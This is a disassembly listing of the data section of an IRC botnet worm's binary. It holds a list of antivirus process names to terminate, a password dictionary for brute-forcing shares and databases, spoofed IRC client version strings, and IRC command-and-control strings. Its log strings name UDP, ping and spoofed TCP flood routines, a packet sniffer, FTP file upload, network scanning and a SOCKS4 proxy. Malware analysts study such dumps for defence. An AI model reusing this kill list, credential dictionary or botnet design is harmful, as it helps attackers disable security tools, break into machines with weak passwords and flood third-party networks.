aAvxmonitor9x_e db 'AVXMONITOR9X.EXE',0 ; DATA XREF: .text:0042EE50�o
align 10h
aAvwupsrv_exe db 'AVWUPSRV.EXE',0 ; DATA XREF: .text:0042EE4C�o
align 10h
aAvwupd32_exe db 'AVWUPD32.EXE',0 ; DATA XREF: .text:0042EE44�o
; .text:0042EE48�o
align 10h
aAvwupd_exe db 'AVWUPD.EXE',0 ; DATA XREF: .text:0042EE40�o
align 4
aAvwinnt_exe db 'AVWINNT.EXE',0 ; DATA XREF: .text:0042EE3C�o
aAvwin95_exe db 'AVWIN95.EXE',0 ; DATA XREF: .text:0042EE38�o
aAvsynmgr_exe db 'AVSYNMGR.EXE',0 ; DATA XREF: .text:0042EE34�o
align 4
aAvsched32_exe db 'AVSCHED32.EXE',0 ; DATA XREF: .text:0042EE30�o
align 4
aAvpupd_exe db 'AVPUPD.EXE',0 ; DATA XREF: .text:0042EE28�o
; .text:0042EE2C�o
align 10h
aAvptc32_exe db 'AVPTC32.EXE',0 ; DATA XREF: .text:0042EE24�o
aAvpm_exe db 'AVPM.EXE',0 ; DATA XREF: .text:0042EE20�o
align 4
aAvpdos32_exe db 'AVPDOS32.EXE',0 ; DATA XREF: .text:0042EE1C�o
align 4
aAvpcc_exe db 'AVPCC.EXE',0 ; DATA XREF: .text:0042EE18�o
align 4
aAvp32_exe db 'AVP32.EXE',0 ; DATA XREF: .text:0042EE14�o
align 10h
aAvp_exe db 'AVP.EXE',0 ; DATA XREF: .text:0042EE10�o
aAvnt_exe db 'AVNT.EXE',0 ; DATA XREF: .text:0042EE0C�o
align 4
aAvltmain_exe db 'AVLTMAIN.EXE',0 ; DATA XREF: .text:0042EE08�o
align 4
aAvkwctl9_exe db 'AVKWCTl9.EXE',0 ; DATA XREF: .text:0042EE04�o
align 4
aAvkservice_exe db 'AVKSERVICE.EXE',0 ; DATA XREF: .text:0042EE00�o
align 4
aAvkserv_exe db 'AVKSERV.EXE',0 ; DATA XREF: .text:0042EDFC�o
aAvkpop_exe db 'AVKPOP.EXE',0 ; DATA XREF: .text:0042EDF8�o
align 4
aAvgw_exe db 'AVGW.EXE',0 ; DATA XREF: .text:0042EDF4�o
align 4
aAvguard_exe db 'AVGUARD.EXE',0 ; DATA XREF: .text:0042EDF0�o
aAvgserv9_exe db 'AVGSERV9.EXE',0 ; DATA XREF: .text:0042EDEC�o
align 4
aAvgserv_exe db 'AVGSERV.EXE',0 ; DATA XREF: .text:0042EDE8�o
aAvgnt_exe db 'AVGNT.EXE',0 ; DATA XREF: .text:0042EDE4�o
align 4
aAvgctrl_exe db 'AVGCTRL.EXE',0 ; DATA XREF: .text:0042EDE0�o
aAvgcc32_exe db 'AVGCC32.EXE',0 ; DATA XREF: .text:0042EDDC�o
aAve32_exe db 'AVE32.EXE',0 ; DATA XREF: .text:0042EDD8�o
align 10h
aAvconsol_exe db 'AVCONSOL.EXE',0 ; DATA XREF: .text:0042EDD4�o
align 10h
aAutoupdate_exe db 'AUTOUPDATE.EXE',0 ; DATA XREF: .text:0042EDD0�o
align 10h
aAutotrace_exe db 'AUTOTRACE.EXE',0 ; DATA XREF: .text:0042EDCC�o
align 10h
aAutodown_exe db 'AUTODOWN.EXE',0 ; DATA XREF: .text:0042EDC8�o
align 10h
aAupdate_exe db 'AUPDATE.EXE',0 ; DATA XREF: .text:0042EDC4�o
aAu_exe db 'AU.EXE',0 ; DATA XREF: .text:0042EDC0�o
align 4
aAtwatch_exe db 'ATWATCH.EXE',0 ; DATA XREF: .text:0042EDBC�o
aAtupdater_exe db 'ATUPDATER.EXE',0 ; DATA XREF: .text:0042EDB4�o
; .text:0042EDB8�o
align 10h
aAtro55en_exe db 'ATRO55EN.EXE',0 ; DATA XREF: .text:0042EDB0�o
align 10h
aAtguard_exe db 'ATGUARD.EXE',0 ; DATA XREF: .text:0042EDAC�o
aAtcon_exe db 'ATCON.EXE',0 ; DATA XREF: .text:0042EDA8�o
align 4
aArr_exe db 'ARR.EXE',0 ; DATA XREF: .text:0042EDA4�o
aApvxdwin_exe db 'APVXDWIN.EXE',0 ; DATA XREF: .text:0042EDA0�o
align 10h
aAplica32_exe db 'APLICA32.EXE',0 ; DATA XREF: .text:0042ED9C�o
align 10h
aApimonitor_exe db 'APIMONITOR.EXE',0 ; DATA XREF: .text:0042ED98�o
align 10h
aAnts_exe db 'ANTS.EXE',0 ; DATA XREF: .text:0042ED94�o
align 4
aAntivirus_exe db 'ANTIVIRUS.EXE',0 ; DATA XREF: .text:0042ED90�o
align 4
aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0 ; DATA XREF: .text:0042ED8C�o
aAmon9x_exe db 'AMON9X.EXE',0 ; DATA XREF: .text:0042ED88�o
align 4
aAlogserv_exe db 'ALOGSERV.EXE',0 ; DATA XREF: .text:0042ED84�o
align 4
aAlevir_exe db 'ALEVIR.EXE',0 ; DATA XREF: .text:0042ED80�o
align 4
aAlertsvc_exe db 'ALERTSVC.EXE',0 ; DATA XREF: .text:0042ED7C�o
align 4
aAgentw_exe db 'AGENTW.EXE',0 ; DATA XREF: .text:0042ED78�o
align 10h
aAgentsvr_exe db 'AGENTSVR.EXE',0 ; DATA XREF: .text:0042ED74�o
align 10h
aAdvxdwin_exe db 'ADVXDWIN.EXE',0 ; DATA XREF: .text:0042ED70�o
align 10h
aAdaware_exe db 'ADAWARE.EXE',0 ; DATA XREF: .text:0042ED6C�o
aAckwin32_exe db 'ACKWIN32.EXE',0 ; DATA XREF: .text:off_42ED68�o
align 4
aCannotExtractP db 'Cannot extract process path for %s',0Ah,0 ; DATA XREF: sub_408D49+2D7�o
aFileDeletedS_ db '[FILE]: Deleted ',27h,'%s',27h,'.',0Ah,0 ; DATA XREF: sub_408D49+2C9�o
align 4
aCouldNotDelete db 'Could not delete ',27h,'%s',27h,'.!',0Ah,0 ; DATA XREF: sub_408D49+2BB�o
align 4
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_408D49+187�o
align 10h
aProcProcessL_0 db '[PROC]: Process list failed.',0 ; DATA XREF: sub_40905C:loc_4090DD�o
align 10h
aProcProcessLis db '[PROC]: Process list completed.',0 ; DATA XREF: sub_40905C+7A�o
aProcListingPro db '[PROC]: Listing processes:',0 ; DATA XREF: sub_40905C+2A�o
align 4
aHttp_0 db 'HTTP',0 ; DATA XREF: .text:0042F754�o
align 4
aFtp db 'FTP',0 ; DATA XREF: .text:0042F750�o
off_4276E8 dd offset byte_435249 ; DATA XREF: .text:0042F74C�o
dword_4276EC dd 544F42h aPsniffErrorRec db '[PSNIFF]: Error: recv() failed, returned: <%d>',0
; DATA XREF: sub_409180+28E�o
align 10h
aPsniffSuspicio db '[PSNIFF]: Suspicious %s packet from: %s:%d - %s.',0
; DATA XREF: sub_409180+21B�o
align 4
aPsniff_0 db '[PSNIFF]',0 ; DATA XREF: sub_409180+1A5�o
align 10h
aPsniffErrorWsa db '[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.',0
; DATA XREF: sub_409180+15D�o
aPsniffErrorBin db '[PSNIFF]: Error: bind() failed, returned: <%d>.',0
; DATA XREF: sub_409180+F1�o
aPsniffErrorSoc db '[PSNIFF]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_409180+7C�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .text:004301AC�o
align 4
aLan db 'lan',0 ; DATA XREF: .text:004301A4�o
aMain db 'main',0 ; DATA XREF: .text:004301A0�o
align 10h
aWinpass db 'winpass',0 ; DATA XREF: .text:0043019C�o
aBlank db 'blank',0 ; DATA XREF: .text:00430198�o
align 10h
aOffice db 'office',0 ; DATA XREF: .text:00430194�o
align 4
aControl db 'control',0 ; DATA XREF: .text:00430190�o
aXp db 'xp',0 ; DATA XREF: .text:0043018C�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .text:00430188�o
align 4
aHp db 'hp',0 ; DATA XREF: .text:00430184�o
align 10h
aSiemens db 'siemens',0 ; DATA XREF: .text:00430180�o
aCompaq db 'compaq',0 ; DATA XREF: .text:0043017C�o
align 10h
aDell db 'dell',0 ; DATA XREF: .text:00430178�o
align 4
aCisco db 'cisco',0 ; DATA XREF: .text:00430174�o
align 10h
aIbm db 'ibm',0 ; DATA XREF: .text:00430170�o
aOrainstall db 'orainstall',0 ; DATA XREF: .text:00430168�o
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .text:00430164�o
align 4
aSql db 'sql',0 ; DATA XREF: .text:00430160�o
aSa db 'sa',0 ; DATA XREF: sub_409848+185B�o
; .text:0043015C�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: .text:00430158�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .text:00430150�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .text:0043014C�o
align 4
aData db 'data',0 ; DATA XREF: .text:00430148�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .text:00430144�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .text:00430140�o
align 10h
aDbpass db 'dbpass',0 ; DATA XREF: .text:0043013C�o
align 4
aAccess db 'access',0 ; DATA XREF: .text:00430138�o
align 10h
aDomainpassword db 'domainpassword',0 ; DATA XREF: .text:00430130�o
align 10h
aDomainpass db 'domainpass',0 ; DATA XREF: .text:0043012C�o
align 4
aDomain db 'domain',0 ; DATA XREF: .text:00430128�o
align 4
aHello db 'hello',0 ; DATA XREF: .text:00430124�o
align 4
aHell db 'hell',0 ; DATA XREF: .text:00430120�o
align 4
aGod db 'god',0 ; DATA XREF: .text:0043011C�o
aSex db 'sex',0 ; DATA XREF: .text:00430118�o
aSlut db 'slut',0 ; DATA XREF: .text:00430114�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .text:00430110�o
align 4
aFuck db 'fuck',0 ; DATA XREF: .text:0043010C�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .text:00430108�o
align 10h
aBackup db 'backup',0 ; DATA XREF: .text:00430104�o
align 4
aTechnical db 'technical',0 ; DATA XREF: .text:00430100�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .text:004300FC�o
align 10h
aLogin db 'login',0 ; DATA XREF: sub_409848+7BB�o
; .text:004300F8�o
align 4
aMary db 'mary',0 ; DATA XREF: .text:004300F4�o
align 10h
aKatie db 'katie',0 ; DATA XREF: .text:004300F0�o
align 4
aKate db 'kate',0 ; DATA XREF: .text:004300E8�o
align 10h
aGeorge db 'george',0 ; DATA XREF: .text:004300E4�o
align 4
aEric db 'eric',0 ; DATA XREF: .text:004300E0�o
align 10h
aChris db 'chris',0 ; DATA XREF: .text:004300DC�o
align 4
aIan db 'ian',0 ; DATA XREF: .text:004300D8�o
aNeil db 'neil',0 ; DATA XREF: .text:004300D4�o
align 4
aLee db 'lee',0 ; DATA XREF: .text:004300D0�o
aBrian db 'brian',0 ; DATA XREF: .text:004300CC�o
align 10h
aSusan db 'susan',0 ; DATA XREF: .text:004300C4�o
align 4
aSue db 'sue',0 ; DATA XREF: .text:004300C0�o
aSam db 'sam',0 ; DATA XREF: .text:004300BC�o
aLuke db 'luke',0 ; DATA XREF: .text:004300B8�o
align 4
aPeter db 'peter',0 ; DATA XREF: .text:004300B4�o
; .text:004300C8�o
align 10h
aJohn db 'john',0 ; DATA XREF: .text:004300B0�o
align 4
aMike db 'mike',0 ; DATA XREF: .text:004300AC�o
align 10h
aBill db 'bill',0 ; DATA XREF: .text:004300A8�o
align 4
aFred db 'fred',0 ; DATA XREF: .text:004300A4�o
align 10h
aJoe db 'joe',0 ; DATA XREF: .text:004300A0�o
aJen db 'jen',0 ; DATA XREF: .text:0043009C�o
aBob db 'bob',0 ; DATA XREF: .text:00430098�o
; .text:004300EC�o
aQwe db 'qwe',0 ; DATA XREF: .text:00430094�o
aZxc db 'zxc',0 ; DATA XREF: .text:00430090�o
aAsd db 'asd',0 ; DATA XREF: .text:0043008C�o
aQaz db 'qaz',0 ; DATA XREF: .text:00430088�o
aWin2000 db 'win2000',0 ; DATA XREF: .text:00430084�o
aWinnt db 'winnt',0 ; DATA XREF: .text:00430080�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .text:0043007C�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .text:00430078�o
align 4
aWin98 db 'win98',0 ; DATA XREF: .text:00430074�o
align 4
aWindows db 'windows',0 ; DATA XREF: .text:00430070�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .text:0043006C�o
align 4
aOemuser db 'oemuser',0 ; DATA XREF: .text:00430068�o
aOem db 'oem',0 ; DATA XREF: .text:00430064�o
aUser db 'user',0 ; DATA XREF: sub_409848+2029�o
; .text:00430060�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: .text:off_43005C�o
align 4
aHome db 'home',0 ; DATA XREF: .text:00430058�o
align 10h
aAccounting db 'accounting',0 ; DATA XREF: .text:00430054�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: .text:00430050�o
align 4
aInternet db 'internet',0 ; DATA XREF: .text:0043004C�o
; .text:004301A8�o
align 4
aWww db 'www',0 ; DATA XREF: .text:00430048�o
aWeb db 'web',0 ; DATA XREF: .text:00430044�o
aOutlook db 'outlook',0 ; DATA XREF: .text:00430040�o
aMail db 'mail',0 ; DATA XREF: .text:0043003C�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .text:00430038�o
align 4
aNull_0 db 'null',0 ; DATA XREF: .text:00430034�o
align 4
aServer db 'server',0 ; DATA XREF: sub_409848+19E9�o
; .text:0043002C�o
align 4
aSystem db 'system',0 ; DATA XREF: .text:00430028�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: .text:00430020�o
align 4
aLinux db 'linux',0 ; DATA XREF: .text:0043001C�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .text:00430018�o
align 4
aDemo db 'demo',0 ; DATA XREF: .text:00430014�o
align 10h
aNone db 'none',0 ; DATA XREF: .text:00430010�o
align 4
aTest db 'test',0 ; DATA XREF: .text:00430008�o
align 10h
a2004 db '2004',0 ; DATA XREF: .text:00430004�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_412B6A+98�o
; .text:00430000�o
align 10h
a2002 db '2002',0 ; DATA XREF: .text:0042FFFC�o
align 4
a2001 db '2001',0 ; DATA XREF: .text:0042FFF8�o
align 10h
a2000 db '2000',0 ; DATA XREF: .text:0042FFF4�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .text:0042FFF0�o
align 4
a123456789 db '123456789',0 ; DATA XREF: .text:0042FFEC�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: .text:0042FFE8�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .text:0042FFE4�o
a123456 db '123456',0 ; DATA XREF: .text:0042FFE0�o
align 4
a12345 db '12345',0 ; DATA XREF: .text:0042FFDC�o
align 4
a1234 db '1234',0 ; DATA XREF: .text:0042FFD8�o
align 4
a123 db '123',0 ; DATA XREF: .text:0042FFD4�o
a12 db '12',0 ; DATA XREF: .text:0042FFD0�o
align 4
a1: ; DATA XREF: .text:0042FFCC�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: .text:0042FFC8�o
aPwd db 'pwd',0 ; DATA XREF: .text:0042FFC4�o
aPass_0 db 'pass',0 ; DATA XREF: .text:0042FFC0�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .text:0042FFBC�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .text:0042FFB8�o
align 4
aPassword db 'password',0 ; DATA XREF: .text:0042FFB4�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: .text:0042FFB0�o
align 4
aAdm db 'adm',0 ; DATA XREF: .text:0042FFAC�o
aDb2 db 'db2',0 ; DATA XREF: .text:0042FF88�o
; .text:00430154�o
aOracle db 'oracle',0 ; DATA XREF: .text:0042FF84�o
; .text:0043016C�o
align 4
aDba db 'dba',0 ; DATA XREF: .text:0042FF80�o
aDatabase db 'database',0 ; DATA XREF: .text:0042FF7C�o
; .text:00430134�o
align 4
aDefault db 'default',0 ; DATA XREF: .text:0042FF78�o
; .text:00430024�o
aGuest_0 db 'guest',0 ; DATA XREF: .text:0042FF74�o
; .text:0043000C�o
align 4
aWwwadmin db 'wwwadmin',0 ; DATA XREF: .text:0042FF70�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: .text:0042FF6C�o
; .text:004301B4�o
aStudent db 'student',0 ; DATA XREF: .text:0042FF68�o
; .text:004301B0�o
aOwner db 'owner',0 ; DATA XREF: .text:0042FF64�o
align 4
aComputer db 'computer',0 ; DATA XREF: .text:0042FF60�o
align 4
aRoot db 'root',0 ; DATA XREF: .text:0042FF5C�o
; .text:00430030�o
align 4
aStaff db 'staff',0 ; DATA XREF: .text:0042FF58�o
; .text:004301B8�o
align 4
aAdmin db 'admin',0 ; DATA XREF: .text:0042FF54�o
; .text:0042FFA8�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .text:0042FF50�o
; .text:0042FFA4�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .text:0042FF4C�o
; .text:0042FFA0�o
aAdministrateur db 'administrateur',0 ; DATA XREF: .text:0042FF48�o
; .text:0042FF9C�o
align 10h
aAdministrador db 'administrador',0 ; DATA XREF: .text:0042FF44�o
; .text:0042FF98�o
align 10h
aAdministrato_0 db 'administrator',0 ; DATA XREF: .text:off_42FF40�o
; .text:0042FF94�o
align 10h
aJpilotIrcJavaC db 'JPilot IRC Java Client 2.32',0 ; DATA XREF: .text:0042FE7C�o
aEggdrop1_3_24i db 'Eggdrop 1.3.24i (c)1997 Robey Pointer',0 ; DATA XREF: .text:0042FE78�o
align 4
aIrcle3_0b10UsP db 'Ircle 3.0b10 US PPC 12/15/1997 21:07:34 PM. #239C23AF21B',0
; DATA XREF: .text:0042FE74�o
align 10h
aQuarterdeckGlo db 'Quarterdeck Global Chat 1.2.9 for Macintosh',0
; DATA XREF: .text:0042FE70�o
align 10h
aAmircAmigaos2_ db 'AmIRC/AmigaOS 2.0.4 by Oliver Wagner <owagner@vapor.com> : http:/'
; DATA XREF: .text:0042FE6C�o
db '/www.vapor.com/ : [#0000D63F] : The slow mess client',0
align 4
aXirconB4Doot_3 db 'xircon[b4] + doot.3b[pawt] be-two + anony(v1) + aolsay(impulse) +'
; DATA XREF: .text:0042FE68�o
db ' deepthought + saq(dbg)',0
align 8
aOsiris1cBitchx db 'osiris-1c/bitchx-75p1 + autobot(bx) p3x3 : that time then and onc'
; DATA XREF: .text:0042FE64�o
db 'e again..',0
align 8
aIrcn7_0rc_67_0 db 'ircN 7.0rc.6 + 7.0rc.5 + 7.0rc.4 for mIRC - the devils of truth s'
; DATA XREF: .text:0042FE60�o
db 'teal the souls of the free -',0
align 4
aIrcn6_03ForMir db 'ircN 6.03 for mIRC - are we being punished for fate -',0
; DATA XREF: .text:0042FE5C�o
align 10h
aWsirc2_03RCopy db 'WSIRC 2.03-R - CopyRight 1994, 1995 Caesar M Samsi csamsi@clark.n'
; DATA XREF: .text:0042FE58�o
db 'et TEXT CHANNEL',0
align 8
aHydraircV0_3_1 db 'HydraIRC v0.3.133-Test (14/March/2004) by Dominic Clifton aka Hyd'
; DATA XREF: .text:0042FE54�o
db 'ra - #HydraIRC on EFNet',0
align 4
aCBasedIrcClien db 'C++ based IRC Client by Jumpincow/shaxxxa/mo00',0
; DATA XREF: .text:0042FE50�o
align 8
aStormbot_tcl3_ db 'StormBot.TCL 3.1.beta.2.10 by Xone & Domino (coders@stormbot.org)'
; DATA XREF: .text:0042FE4C�o
db 0
align 4
aEggdropV1_6_13 db 'eggdrop v1.6.13',0 ; DATA XREF: .text:0042FE48�o
aEggdropV1_6_15 db 'eggdrop v1.6.15',0 ; DATA XREF: .text:0042FE44�o
aMirc32V1_0K_ma db 'mIRC32 v1.0 K .Mardam-Bey',0 ; DATA XREF: .text:0042FE40�o
align 4
aMircV6_14K_mar db 'mIRC v6.14 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE3C�o
aMircV6_12K_mar db 'mIRC v6.12 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE38�o
aMircV6_10K_mar db 'mIRC v6.10 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE34�o
aMircV6_1K_mard db 'mIRC v6.1 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE28�o
align 4
aMircV6_03K_mar db 'mIRC v6.03 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE24�o
; .text:0042FE30�o
aMircV6_01K_mar db 'mIRC v6.01 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE20�o
; .text:0042FE2C�o
aMircV5_82K_mar db 'mIRC v5.82 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE1C�o
aMircV5_71K_mar db 'mIRC v5.71 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE18�o
aMirc32V6_12K_m db 'mIRC32 v6.12 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE14�o
align 4
aMirc32V6_03K_m db 'mIRC32 v6.03 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE10�o
align 10h
aMirc32V6_01K_m db 'mIRC32 v6.01 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE0C�o
align 4
aMirc32V5_82K_m db 'mIRC32 v5.82 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE08�o
align 4
aMirc32V5_71K_m db 'mIRC32 v5.71 K.Mardam-Bey',0 ; DATA XREF: .text:0042FE04�o
align 4
aIrssiV0_8_4Run db 'irssi v0.8.4 - running on Linux i686',0 ; DATA XREF: .text:0042FE00�o
align 4
aIrcn7_277_0Eve db 'ircN 7.27 + 7.0 - everyone i know goes away in the end -',0
; DATA XREF: .text:0042FDFC�o
align 4
aXchat1_8_10Lin db 'xchat 1.8.10 Linux 2.4.25p1mp [i686/501MHz]',0
; DATA XREF: .text:0042FDF8�o
aIrcii2_9_baseO db 'ircII 2.9_base OSF1 V4.0 :ircii 2.8: almost there...',0
; DATA XREF: .text:0042FDF4�o
align 4
aIrcii2_8_2Suno db 'ircII 2.8.2 SunOS 5.6 :ircii 2.8: almost there...',0
; DATA XREF: .text:0042FDF0�o
align 10h
aIrcii2_9Bitchx db 'ircII 2.9-BitchX-60 Linux 1.2.8 :bitZ%summer ',27h,'96(bitX%summer',27h
; DATA XREF: .text:0042FDEC�o
db '96)',0
align 8
aIrciiEpic4pre2 db 'ircII EPIC4pre2 SunOS 5.6 - cypher(beta\one) -myd!nas :one step c'
; DATA XREF: .text:0042FDE8�o
db 'loser to world domination',0
align 4
aIrciiEpic4pr_0 db 'ircII EPIC4pre2 Linux 2.0.34 - Accept no limitations.',0
; DATA XREF: .text:0042FDE4�o
align 10h
aBx_75p1Linux2_ db '[bx.75p1] linux 2.0.36 [embryonic.22b3] :what is this that stands'
; DATA XREF: .text:0042FDE0�o
db ' before me',0
align 10h
aBitchx1_0c18By db 'BitchX-1.0c18+ by panasync - IRIX 6.5.10 Silicon Graphics : Keep '
; DATA XREF: .text:0042FDDC�o
db 'it to yourself!',0
align 8
aBitchx74p21_3f db 'BitchX-74p2+1.3f/SunOS 5.6 :(c)rackrock/bX [3.0.18] : Keep it to'
; DATA XREF: .text:0042FDD8�o
db ' yourself!',0
align 8
aBitchx1_0c19By db 'BitchX-1.0c19+ by panasync - FreeBSD 4.10-BETA : Keep it to yours'
; DATA XREF: .text:0042FDD4�o
db 'elf!',0
align 10h
aBitchx70alpha1 db 'BitchX-70alpha14+tcl by panasync - Linux 2.0.27 Keep it to yours'
; DATA XREF: .text:0042FDD0�o
db 'elf!',0
align 4
a__Argon1gBitch db '..(argon/1g) :bitchx-75 : Keep it to yourself!',0
; DATA XREF: .text:0042FDCC�o
align 4
aBitchx74p2ByPa db 'BitchX-74p2+ by panasync - CYGWIN32/95 4.0 : Keep it to yourself!'
; DATA XREF: .text:0042FDC8�o
db 0
align 4
aMircV6_03Khale db 'mIRC v6.03 Khaled Mardam-Bey',0 ; DATA XREF: .text:0042FDC4�o
align 4
aMircV6_12Khale db 'mIRC v6.12 Khaled Mardam-Bey',0 ; DATA XREF: .text:off_42FDC0�o
align 4
a@celestial_org db '*@celestial.org',0 ; DATA XREF: .text:off_42FDB8�o
asc_4285BC: ; DATA XREF: sub_40946D+129�o
; sub_40946D+1AD�o
unicode 0, <|>,0
asc_4285C0 db ' :',0 ; DATA XREF: sub_40946D:loc_40954D�o
; sub_409848+7D�o ...
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40946D+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 10h
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40946D+38�o
align 4
aMainConnectedT db '[MAIN]: Connected to %s.',0 ; DATA XREF: sub_4096E9+9F�o
align 4
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_409848+62D4�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_409848+62BF�o
align 4
aMainUserSLog_1 db '[MAIN]: User: %s logged in.',0 ; DATA XREF: sub_409848+62AB�o
aMainPasswordAc db '[MAIN]: Password accepted.',0 ; DATA XREF: sub_409848+628E�o
align 10h
aMainFailedHost db '[MAIN]: *Failed host auth by: (%s!%s).',0 ; DATA XREF: sub_409848+6216�o
align 4
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_409848+61F3�o
align 10h
aMainFailedPass db '[MAIN]: *Failed pass auth by: (%s!%s).',0 ; DATA XREF: sub_409848+61AF�o
align 4
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_409848+61A0�o
; sub_409848+6207�o
align 4
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_409848+618C�o
align 4
asc_42872C: ; DATA XREF: sub_409848+613A�o
unicode 0, <~>,0
dword_428730 dd 0 aMainRandomNick db '[MAIN]: Random nick change: %s',0 ; DATA XREF: sub_409848+60EA�o
align 4
aScanFailedTo_2 db '[SCAN]: Failed to start scan, no IP specified.',0
; DATA XREF: sub_409848+5E9D�o
align 4
aStoppingPrevio db 'Stopping previous scans',0 ; DATA XREF: sub_409848+5E62�o
aUdpFailedToSta db '[UDP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409848+5C3C�o
align 10h
aUdpSendingDPac db '[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).'
; DATA XREF: sub_409848+5BD7�o
db 0
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_409848+5B10�o
align 4
aPingFailedToSt db '[PING]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409848+5AE6�o
align 10h
aPingSendingDPi db '[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).'
; DATA XREF: sub_409848+5A8B�o
db 0
align 4
aTcpInvalidFl_0 db '[TCP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_409848:loc_40F20D�o
align 4
aTcpFailedToSta db '[TCP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_409848+59A9�o
align 4
aTcpSSFloodingS db '[TCP]: %s %s flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_409848+5943�o
align 4
aNormal db 'Normal',0 ; DATA XREF: sub_409848+5935�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_409848+592E�o
aTcpInvalidFloo db '[TCP]: Invalid flood type specified.',0 ; DATA XREF: sub_409848+587F�o
align 4
aRandom_0 db 'random',0 ; DATA XREF: sub_409848+5873�o
; sub_412E87+229�o
align 4
aAck db 'ack',0 ; DATA XREF: sub_409848+585F�o
; sub_412E87+209�o
aFtpUploading_0 db '[FTP]: Uploading file: %s to: %s failed.',0
; DATA XREF: sub_409848:loc_40EFCD�o
align 4
aFtpUploadingFi db '[FTP]: Uploading file: %s to: %s',0 ; DATA XREF: sub_409848+577E�o
align 10h
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_409848+5767�o
aSS_4 db '-s:%s',0 ; DATA XREF: sub_409848+574E�o
align 10h
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_409848+572E�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_409848+56EA�o
align 4
aFtpFileNotFoun db '[FTP]: File not found: %s.',0 ; DATA XREF: sub_409848+5691�o
align 10h
aUpload db 'upload',0 ; DATA XREF: sub_409848+566B�o
align 4
aHcon db 'hcon',0 ; DATA XREF: sub_409848+564A�o
align 10h
aHttpcon db 'httpcon',0 ; DATA XREF: sub_409848+5636�o
aMainInvalidLog db '[MAIN]: Invalid login slot number: %d.',0 ; DATA XREF: sub_409848+5570�o
align 10h
aMainNoUserLogg db '[MAIN]: No user logged in at slot: %d.',0 ; DATA XREF: sub_409848+5568�o
align 4
aMainS db '[MAIN]: %s',0 ; DATA XREF: sub_409848+5506�o
align 4
aSecureFailedTo db '[SECURE]: Failed to start secure thread, error: <%d>.',0
; DATA XREF: sub_409848+54E2�o
; sub_40FB4C+3DE�o
align 4
aSecureSSystem_ db '[SECURE]: %s system.',0 ; DATA XREF: sub_409848+547E�o
align 4
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_409848+5478�o
align 10h
aSecuring db 'Securing',0 ; DATA XREF: sub_409848+5471�o
align 4
aSocks4FailedTo db '[SOCKS4]: Failed to start server thread, error: <%d>.',0
; DATA XREF: sub_409848+53E3�o
align 4
